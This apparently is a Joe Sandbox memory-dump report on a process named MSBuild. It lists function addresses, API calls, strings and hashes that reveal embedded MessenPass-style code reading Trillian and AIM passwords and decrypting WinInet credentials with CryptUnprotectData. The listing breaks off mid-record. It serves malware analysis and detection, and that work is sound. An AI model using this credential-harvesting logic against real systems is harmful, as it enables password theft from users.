Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$LibraryLoadmemsetwcslen
String ID:
API String ID: 1960736289-0
Opcode ID: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
Instruction ID: 2dd004568a6c17cef409d44c463746fb2ce178d2970b6d5fdfdea9e5a7127ffe
Opcode Fuzzy Hash: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
Instruction Fuzzy Hash: D931A331500159BFCB11DFA4CD819EF77A8AF88304F14447EF985B7181DA38AE599B68

Function 0040D9B9 Relevance: 2.6, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D9E1
memset.MSVCRT ref: 0040D9F8

Part of subcall function 00413735: memset.MSVCRT ref: 00413757
Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$Closememcpystrlen
String ID:
API String ID: 1317463181-0
Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65

Function 0040733E Relevance: 2.5, APIs: 2, Instructions: 14COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00407341
free.MSVCRT ref: 00407349

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 58ac891cade6ab6a9bef53ce8be61fa91b6cb828682ec7c513dabb990eb490b2
Instruction ID: 60201c5085d43ced1243c36dc80756929096d21483c981360304d2deafd8db66
Opcode Fuzzy Hash: 58ac891cade6ab6a9bef53ce8be61fa91b6cb828682ec7c513dabb990eb490b2
Instruction Fuzzy Hash: AFD042B0908B008FC7B0DF39E401542BBF0EB083257108D3ED0AAC2A50E735A1449F04

Function 0040F9A0 Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE

Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
Part of subcall function 00406D2B: CloseHandle.KERNELBASE(00000000,?,?,00000000), ref: 00406D4F

CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$FileTime$CloseCompareHandlememset
String ID:
API String ID: 3621460190-0
Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65

Function 00411D82 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64

Function 00411D37 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E

Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfile$StringWrite_itoamemset
String ID:
API String ID: 4165544737-0
Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84

Function 00406ED6 Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98

Function 004067D3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524

Function 004067BA Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524

Function 00404CE0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18

Function 00412111 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605

Function 00407930 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04

Function 00411D68 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57

Function 004069D3 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00

Non-executed Functions

Function 004068B5 Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 004068BF

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
GlobalLock.KERNEL32(00000000), ref: 004068FA
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
GlobalUnlock.KERNEL32(00000000), ref: 0040691C
SetClipboardData.USER32(00000001,00000000), ref: 00406925
GetLastError.KERNEL32 ref: 0040692D
CloseHandle.KERNEL32(?), ref: 00406939
GetLastError.KERNEL32 ref: 00406944
CloseClipboard.USER32 ref: 0040694D

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69

Function 0040B4F6 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 286windowregistrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54

SetMenu.USER32(?,00000000), ref: 0040B61C
SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
_strcmpi.MSVCRT ref: 0040B799
RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
SetFocus.USER32(?), ref: 0040B7E1
GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
strlen.MSVCRT ref: 0040B812
strlen.MSVCRT ref: 0040B820
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D

Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9

SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0

Strings

commdlg_FindReplace, xrefs: 0040B868
report.html, xrefs: 0040B819, 0040B831
/sm, xrefs: 0040B889
xA, xrefs: 0040B7EE
/noloadsettings, xrefs: 0040B793
SysListView32, xrefs: 0040B6C1
Software\NirSoft\MessenPass, xrefs: 0040B7A4

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html$xA
API String ID: 2862451953-132385428
Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9

Function 0040244D Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040246E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C

Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6

??2@YAPAXI@Z.MSVCRT(00000048), ref: 004024B9
??2@YAPAXI@Z.MSVCRT(00000048), ref: 004024C8
memcpy.MSVCRT(?,?,00000008,00000048), ref: 004025B4
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004025F4
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004025FC

Strings

X, xrefs: 00402514
G, xrefs: 00402528
), xrefs: 0040259C
[, xrefs: 00402580
), xrefs: 00402584
W, xrefs: 004025B0
', xrefs: 00402504
f, xrefs: 00402544
[, xrefs: 004025A8
:, xrefs: 0040252C
0, xrefs: 00402588
5, xrefs: 00402530

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
String ID: '$)$)$0$5$:$G$W$X$[$[$f
API String ID: 3606715663-4187034442
Opcode ID: 9ec1ca22aa804eaa605246bdd2a6f6e6c44204bb0a719d98b50d6f203c3d0bd6
Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
Opcode Fuzzy Hash: 9ec1ca22aa804eaa605246bdd2a6f6e6c44204bb0a719d98b50d6f203c3d0bd6
Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A

Function 0040E0A1 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 142stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E0C7
strlen.MSVCRT ref: 0040E0CF
strlen.MSVCRT ref: 0040E0DB
GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
memset.MSVCRT ref: 0040E146
memset.MSVCRT ref: 0040E15A
memset.MSVCRT ref: 0040E16E
memset.MSVCRT ref: 0040E182
memset.MSVCRT ref: 0040E196
sprintf.MSVCRT ref: 0040E1AA
GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

Accounts, xrefs: 0040E115
Password, xrefs: 0040E1EE
num, xrefs: 0040E110
accounts.ini, xrefs: 0040E0D4, 0040E0EB
Account%3.3d, xrefs: 0040E1A4
Account, xrefs: 0040E1CC

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
API String ID: 1850607429-3672167483
Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4

Function 004124D4 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004124F5
memset.MSVCRT ref: 00412509
_mbscpy.MSVCRT(?,<font,?,?,?,?,?), ref: 00412536
sprintf.MSVCRT ref: 00412551
_mbscat.MSVCRT ref: 0041255E
sprintf.MSVCRT ref: 00412588
_mbscat.MSVCRT ref: 00412595
_mbscat.MSVCRT ref: 004125A3
_mbscat.MSVCRT ref: 004125B5
_mbscat.MSVCRT ref: 004125C0
_mbscat.MSVCRT ref: 004125D2
_mbscat.MSVCRT ref: 004125E4

Strings

size="%d", xrefs: 0041254B
</font>, xrefs: 004125DE
<font, xrefs: 00412530
<b>, xrefs: 004125AF
</b>, xrefs: 004125CC
color="#%s", xrefs: 00412582

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscat$memsetsprintf$_mbscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 633282248-1996832678
Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD

Function 0040DD65 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 178stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DD8B
strlen.MSVCRT ref: 0040DD93
strlen.MSVCRT ref: 0040DD9D
memset.MSVCRT ref: 0040DDEB
memset.MSVCRT ref: 0040DDF9
memset.MSVCRT ref: 0040DE07
memset.MSVCRT ref: 0040DE1F
sprintf.MSVCRT ref: 0040DE46
GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

sprintf.MSVCRT ref: 0040DF73
GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0

Strings

profile %d, xrefs: 0040DE2B, 0040DF58
password, xrefs: 0040DE8A, 0040DFB4
name, xrefs: 0040DE68, 0040DF96

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
String ID: name$password$profile %d
API String ID: 3544386798-2462908242
Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4

Function 004010D0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003EC), ref: 00401118
ChildWindowFromPoint.USER32(?,?,?), ref: 00401126

Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81

GetDlgItem.USER32(?,000003EC), ref: 00401161
ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
LoadCursorA.USER32(00000067), ref: 00401186
SetCursor.USER32(00000000,?,?), ref: 0040118D
GetDlgItem.USER32(?,000003EC), ref: 0040119D
SetBkMode.GDI32(?,00000001), ref: 004011B1
SetTextColor.GDI32(?,00C00000), ref: 004011BF
GetSysColorBrush.USER32(0000000F), ref: 004011C7
EndDialog.USER32(?,00000001), ref: 004011E5
DeleteObject.GDI32(?), ref: 004011F1
SetWindowTextA.USER32(?,MessenPass), ref: 00401204
SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D

Strings

MessenPass, xrefs: 004011FC

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
String ID: MessenPass
API String ID: 2410034309-1347981195
Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88

Function 00404578 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040459A
memset.MSVCRT ref: 004045BA
wcschr.MSVCRT ref: 0040464E
wcsncmp.MSVCRT ref: 00404667
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?), ref: 00404700
wcschr.MSVCRT ref: 00404714
wcscpy.MSVCRT ref: 0040472B
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004047E3
LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C

Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB

memcpy.MSVCRT(?,00000008,?,?,?), ref: 0040483B

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

Strings

Microsoft_WinInet, xrefs: 0040458C
?L@, xrefs: 00404578

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProcmemsetwcscpywcslenwcsncmp
String ID: ?L@$Microsoft_WinInet
API String ID: 4201671097-2674056311
Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
